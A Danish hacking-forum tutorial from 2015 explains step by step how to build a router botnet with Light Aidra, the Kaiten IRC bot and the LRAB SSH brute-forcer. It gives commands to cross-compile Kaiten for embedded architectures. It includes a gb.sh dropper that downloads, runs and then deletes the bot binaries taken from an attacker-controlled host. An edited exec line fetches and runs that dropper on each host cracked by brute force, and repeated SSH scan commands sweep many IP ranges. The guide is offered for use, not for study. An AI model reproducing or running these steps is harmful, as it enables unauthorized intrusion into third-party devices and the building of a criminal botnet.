24-08-2015, 22:08
Light Aidra og LRAB - Bruteforce dig til et stort botnet.
Vejledning af Sc0rp10n
Vejledning af Sc0rp10n
Du skal have en dedikeret server som tillader scanning og hvilken som helst server som er unmetered.
Download Light Aidra her: http://0xplanet.com/archive/Botnets/Ligh...master.zip
Efter du har unzippet filen og omdøbt filen til noget kort.
Når LA er placeret et sted og omdøbt så cd hen til LA så skriv mkdir bin -
Derefter cd til bin og skriv derefter nano s.sh og tilføj cross compliers.
Cross compliers i raw link format: http://pastebin.com/raw.php?i=edrqt9RB
wget http://uclibc.org/downloads/binaries/0.9...ps.tar.bz2 && tar -xvjf cross-compiler-mips.tar.bz2 && rm -rf cross-compiler-mips.tar.bz2
wget http://uclibc.org/downloads/binaries/0.9...el.tar.bz2 && tar -xvjf cross-compiler-mipsel.tar.bz2 && rm -rf cross-compiler-mipsel.tar.bz2
wget http://uclibc.org/downloads/binaries/0.9...5l.tar.bz2 && tar -xvjf cross-compiler-armv5l.tar.bz2 && rm -rf cross-compiler-armv5l.tar.bz2
wget http://uclibc.org/downloads/binaries/0.9...pc.tar.bz2 && tar -xvjf cross-compiler-powerpc.tar.bz2 && rm -rf cross-compiler-powerpc.tar.bz2
wget http://uclibc.org/downloads/binaries/0.9...h4.tar.bz2 && tar -xvjf cross-compiler-sh4.tar.bz2 && rm -rf cross-compiler-sh4.tar.bz2
wget http://uclibc.org/downloads/binaries/0.9...32.tar.bz2 && tar -xvjf cross-compiler-x86_32.tar.bz2 && rm -cross-compiler-x86_32.tar.bz2
Efter du har gemt din redigering skal du chmod filen (s.sh).
For at chmod filen skriv: chmod 777 s.sh
Efter det er gjort skal du skrive sh s.sh og så lad den køre.
Nu skal du downloade en irc bot som er passende og for startere anbefaler jeg Kaiten.
Download Kaiten her: ftp.109.235.50.139/pub/kaiten.c
Når Kaiten er installeret skal du redigere kaiten.c til dine egne informationer efter et er gjort skal du upload din modificeret version af Kaiten med dine infos.
Nu skal du cd ind i /root/LA/bin når det er gjordt cd til alle dine compliers og complie dem.
Eksemepl:
cd cross-compiler-mipsel/bin
wget ftp://DitFtpLinkForModificeretKaiten
./mipsel-gcc -o mipsel kaiten.c
og sådan skal du bare gøre med resten af dine cross compliers.
Efter du har cross complied er der en ny fil som hedder det samme som compilied cross complier den køre du foreksempel sådan her:/mipsel-gcc -o mipsel kaiten.c det laver en ny fil som hedder mipsel, filen er din complied kaiten du vil bruge i botex.
Når det er gjort skriv mkdir /root/Compiled og flyt alle dine compliede bots derhen. Eksempel: mv mipsel /root/Compiled
Nu skal du installere Httpd, ved brug af yum install, apt-get etc.
Når du har downloadet Httpd skriv service httpd start for at starte httpd.
Efter du har startet httpd så skal du cd ind i din compiled mappe og flyt alt over i /var/www/html/.
Eksempel: mv mips mipsel sh4 powerpc x86_64 armv5l /var/www/html/
Skriv cd /var/www/html/ for at cd til /var/www/html/ og skriv så nano gb.sh og redigere den med koden herunder:
#!/bin/sh
wget -c http://ditlink.dk/armv5l -P /var/run && chmod +x /var/run/armv5l && /var/run/armv5l
wget -c http://ditlink.dk/mips -P /var/run && chmod +x /var/run/mips && /var/run/mips
wget -c http://ditlink.dk/mipsel -P /var/run && chmod +x /var/run/mipsel && /var/run/mipsel
wget -c http://ditlink.dk/powerpc -P /var/run && chmod +x /var/run/powerpc && /var/run/powerpc
wget -c http://ditlink.dk/sh4 -P /var/run && chmod +x /var/run/sh4 && /var/run/sh4
wget -c http://ditlink.dk/x86_64 -P /var/run && chmod +x /var/run/x86_64 && /var/run/x86_64
sleep 3;
rm -fr /var/run/gb.sh
Gem redigeringer og chmod filen gb.sh.
Eksempel: chmod 777 gb.sh
Nu skal du installere Botex
Installere disse moduler med cpan
cpan force install IO::Socket
cpan force install IO::Select
cpan force install Parallel::ForkManager
cpan force install Net::SSH2
Efter det skriv følgende i din terminal for at rette ssh2:yum install gcc php-devel php-pear libssh2 libssh2-devel
pecl install -f ssh2
touch /etc/php.d/ssh2.ini
echo extension=ssh2.so > /etc/php.d/ssh2.ini
cpan force install Net::SSH2
Nu skal du download LRABLink: https://b.1339.cf/surknso.rar
Når du har overført LRAB til din server efter at have downloaded og unzippet den på din computer så åben LRAB og åben filen "wget.pl" og gå så over til linje 26 i wget.pl og ændre linjen.
channel->exec('cd /tmp && wget http://ditlink.dk/gb.sh && sh gb.sh && rm -rf gb.sh');
Når et er gjort skal du scanne for at lave lister, sådan her lavet du et scan../class PORT -a RANGE -i INTERFACE -s 10
Når du har lavet en liste så skriv ./go og så vil den spørge om "Max Process" og så sæt den mellem 600 og 1000 og så bruteforcer den listen du har lavet. Når bruteforcing er færdigt så nano wget.pl og redigere linje 11open(fh,'<','vuln.txt'); @newarray; while (<fh>){ @array = split(':',$_);
Ændre vuln.txt til din txt-fil og gemt så filen wget.pl og i din terminal skal du så bare execute wget.pl med perlEksempel: perl wget.pl
Jeg har lavet en masse fil for scanning af min modificeret LRAB version.
./class 22 -a 170 -i eth0 -s 10
./class 22 -a 171 -i eth0 -s 10
./class 22 -a 172 -i eth0 -s 10
./class 22 -a 173 -i eth0 -s 10
./class 22 -a 174 -i eth0 -s 10
./class 22 -a 175 -i eth0 -s 10
./class 22 -a 176 -i eth0 -s 10
./class 22 -a 177 -i eth0 -s 10
./class 22 -a 178 -i eth0 -s 10
./class 22 -a 179 -i eth0 -s 10
./class 22 -a 130 -i eth0 -s 10
./class 22 -a 131 -i eth0 -s 10
./class 22 -a 132 -i eth0 -s 10
./class 22 -a 133 -i eth0 -s 10
./class 22 -a 134 -i eth0 -s 10
./class 22 -a 135 -i eth0 -s 10
./class 22 -a 136 -i eth0 -s 10
./class 22 -a 137 -i eth0 -s 10
./class 22 -a 138 -i eth0 -s 10
./class 22 -a 139 -i eth0 -s 10
./class 22 -a 140 -i eth0 -s 10
cat bios.txt | sort | uniq > mfu.txt
screen ./update 5000
Update er bedre modificeret bruteforcer. Hvis du er nervøs for at bruge update fordi den er obfusticated så skriv screen ./go 5000Tillykke du nu sat op light adria og LRAB op og har lært at bruteforce routere.